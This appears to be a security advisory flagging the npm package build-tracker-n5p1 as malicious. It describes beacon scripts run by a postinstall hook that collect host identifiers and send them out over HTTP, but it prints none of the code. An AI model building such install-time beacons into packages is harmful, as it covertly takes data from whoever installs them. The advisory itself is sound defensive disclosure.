—

MAL-2026-6196

Malicious code in build-tracker-n5p1 (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (e731775fde27ad6db493d20397b27eee9b4a6ea0bf515f9516cc974ea3e12619) Package name suggests build telemetry tooling, but the tarball ships beacon scripts (beacon18.js, beacon_linux.js) wired to a postinstall lifecycle hook ("postinstall": "node run.js" in package.json line 9). On install, these scripts collect host identifiers via os.hostname()/os.platform() and child_process, then issue outbound HTTP GET/POST requests via http.request from the installer's machine. This combination — auto-execute on install, host fingerprinting, and outbound HTTP exfiltration — is a classic install-time host beacon / data-exfiltration pattern. There is no legitimate build-tracking reason to fingerprint the host and beacon out at install time without consent or configuration.

Are you affected?

Enter the version of the package you're using.

Affected packages

npm / build-tracker-n5p1

No fixed version published yet for build-tracker-n5p1 (npm). Pin to a known-safe version or switch to an alternative.

References

https://www.npmjs.com/package/build-tracker-n5p1/v/1.0.0 [PACKAGE]